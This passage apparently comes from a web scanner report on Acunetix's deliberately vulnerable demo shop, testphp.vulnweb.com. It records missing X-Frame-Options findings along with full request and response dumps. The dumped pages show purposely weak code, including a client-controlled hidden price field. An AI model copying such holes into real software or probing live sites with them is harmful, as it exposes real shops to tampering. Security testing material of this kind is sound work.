<div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The shore</h2><div class='story'><p><a href='showimage.php?file=./pictures/1.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/1.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $500</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='500'><input type='hidden' name='addcart' value='1'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=2 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=2 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:07 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6368 |
Response Body - size: 6,368 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mistery</h2><div class='story'><p><a href='showimage.php?file=./pictures/2.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/2.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $800</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='800'><input type='hidden' name='addcart' value='2'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=3 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=3 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:08 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6401 |
Response Body - size: 6,401 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>The universe</h2><div class='story'><p><a href='showimage.php?file=./pictures/3.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/3.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet. Donec molestie. Sed aliquam sem ut arcu.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $986</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='986'><input type='hidden' name='addcart' value='3'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=4 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=4 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:09 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6453 |
Response Body - size: 6,453 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Walking</h2><div class='story'><p><a href='showimage.php?file=./pictures/4.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/4.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Donec molestie. Sed aliquam sem ut arcu. Phasellus sollicitudin. </p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $1000</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='1000'><input type='hidden' name='addcart' value='4'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=5 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=5 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=1 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:10 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6382 |
Response Body - size: 6,382 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/main_dynamic_template.dwt.php" codeOutsideHTMLIsLocked="false" --> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-2"> <!-- InstanceBeginEditable name="document_title_rgn" --> <title>picture details</title> <!-- InstanceEndEditable --> <link rel="stylesheet" href="style.css" type="text/css"> <!-- InstanceBeginEditable name="headers_rgn" --> <script language="javascript1.2"> <!-- function popUpWindow(URLStr, left, top, width, height) { window.open(URLStr, 'popUpWin', 'toolbar=no,location=no,directories=no,status=no,menub ar=no,scrollbar=no,resizable=no,copyhistory=yes,width='+width+',height='+height+',left='+left+', top='+top+',screenX='+left+',screenY='+top+''); } --> </script> <!-- InstanceEndEditable --> <script language="JavaScript" type="text/JavaScript"> <!-- function MM_reloadPage(init) { //reloads the window if Nav4 resized if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) { document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }} else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload(); } MM_reloadPage(true); //--> </script> </head> <body> <div id="mainLayer" style="position:absolute; width:700px; z-index:1"> <div id="masthead"> <h1 id="siteName"><a href="https://www.acunetix.com/"><img src="images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></h1> <h6 id="siteInfo">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></h6> <div id="globalNav"> <table border="0" cellpadding="0" cellspacing="0" width="100%"><tr> <td align="left"> <a href="index.php">home</a> | <a href="categories.php">categories</a> | <a href="artists.php">artists </a> | <a href="disclaimer.php">disclaimer</a> | <a href="cart.php">your cart</a> | <a href="guestbook.php">guestbook</a> | <a href="AJAX/index.php">AJAX Demo</a> </td> <td align="right"> </td> </tr></table> </div> </div> <!-- end masthead --> <!-- begin content --> <!-- InstanceBeginEditable name="content_rgn" --> <div id="content"> <h2 id='pageName'>Mean</h2><div class='story'><p><a href='showimage.php?file=./pictures/5.jpg' target='_blank'><img style='cursor:pointer' border='0' align='center' src='showimage.php?file=./pictures/5.jpg&size=160' width='160' height='100'></a><h3>Short description</h3><p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit.</p><h3>Long description</h3><p><p> This picture is an 53 cm x 12 cm masterpiece. </p> <p> This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information.This text is not meant to be read. This is being used as a place holder. Please feel free to change this by inserting your own information. </p></p><p>painted by: <a href='artists.php?artist=1'>r4w8173</a></p><p>the price of this item is: $460</p></div><div class='story'><form name='f_addcart' method='POST' action='cart.php'><input type='hidden' name='price' value='460'><input type='hidden' name='addcart' value='5'><input type='submit' value='add this picture to cart'></form></div></div> <!-- InstanceEndEditable --> <!--end content --> <div id="navBar"> <div id="search"> <form action="search.php?test=query" method="post"> <label>search art</label> <input name="searchFor" type="text" size="10"> <input name="goButton" type="submit" value="go"> </form> </div> <div id="sectionLinks"> <ul> <li><a href="categories.php">Browse categories</a></li> <li><a href="artists.php">Browse artists</a></li> <li><a href="cart.php">Your cart</a></li> <li><a href="login.php">Signup</a></li> <li><a href="userinfo.php">Your profile</a></li> <li><a href="guestbook.php">Our guestbook</a></li> <li><a href="AJAX/index.php">AJAX Demo</a></li> </li> </ul> </div> <div class="relatedLinks"> <h3>Links</h3> <ul> <li><a href="http://www.acunetix.com">Security art</a></li> <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li> <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li> <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> </ul> </div> <div id="advert"> <p> <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66"> <param name="movie" value="Flash/add.swf"> <param name=quality value=high> <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed> </object> </p> </div> </div> <!--end navbar --> <div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | ©2019 Acunetix Ltd </div> <br> <div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p> </div> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testphp.vulnweb.com/product.php?pic=6 |
Method | GET |
Parameter | X-Frame-Options |
Attack | |
Evidence | |
Request Header - size: 291 bytes. |
GET http://testphp.vulnweb.com/product.php?pic=6 HTTP/1.1
Host: testphp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testphp.vulnweb.com/listproducts.php?cat=2 |
Request Body - size: 0 bytes. |
|
Response Header - size: 222 bytes. |
HTTP/1.1 200 OK
Server: nginx/1.19.0 Date: Tue, 13 Dec 2022 04:17:17 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1 Content-Length: 6454 |
Response Body - size: 6,454 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
